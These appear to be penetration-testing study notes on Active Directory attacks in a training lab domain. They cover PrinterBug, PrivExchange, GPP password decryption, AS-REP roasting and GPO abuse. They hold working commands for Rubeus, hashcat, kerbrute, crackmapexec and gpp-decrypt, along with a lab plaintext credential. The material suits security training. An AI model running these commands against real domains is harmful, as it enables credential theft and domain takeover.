Misconfigurations

Key Concepts:

• The Exchange Windows Permissions group, if misconfigured, allows for DCSync privileges.

• The Organization Management group grants extensive control over Exchange and mailboxes.

• Compromised Exchange servers are prime targets for credential dumping.

• PrivExchange: Exploiting the PushSubscription feature for NTLM relay and potential domain compromise.

---

Printer Bug (MS-RPRN Protocol Flaw)

Key Concepts:

• The MS-RPRN protocol flaw allows for NTLM relay via the Print Spooler service.

• This can lead to DCSync privileges or Resource-Based Constrained Delegation (RBCD) exploitation.

• It can be used to attack across forest trusts.

Commands:

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

---

MS14-068 (Kerberos PAC Forging)

Key Concepts:

• This vulnerability allows for forging Kerberos PACs to elevate privileges.

• Patching is the only effective defense.

---

Sniffing LDAP Credentials

Key Concepts:

• Exploiting weak configurations in applications and printers that store LDAP credentials.

• Using netcat to capture credentials.

---

Enumerating DNS Records (adidnsdump)

Key Concepts:

• Using adidnsdump to discover hidden DNS records.

Commands:

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r

---

Other Misconfigurations

Password in Description Field:

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Field:

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts:

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

---

Group Policy Preferences (GPP) Passwords

Key Concepts:

• Exploiting cpassword values in GPP XML files.

• Using gpp-decrypt and CrackMapExec.

Commands:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
crackmapexec smb -L | grep gpp
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

---

AS-REP Roasting

Key Concepts:

• Exploiting accounts with "Do not require Kerberos pre-authentication" enabled.

• Using Rubeus, Hashcat, and Kerbrute.

Commands:

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

./Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

---

Group Policy Object (GPO) Abuse

Key Concepts:

• Exploiting misconfigured GPO permissions for privilege escalation and persistence.

• Abusing GPOs to:

  • Add local admin accounts

  • Create scheduled tasks

  • Grant additional privileges to users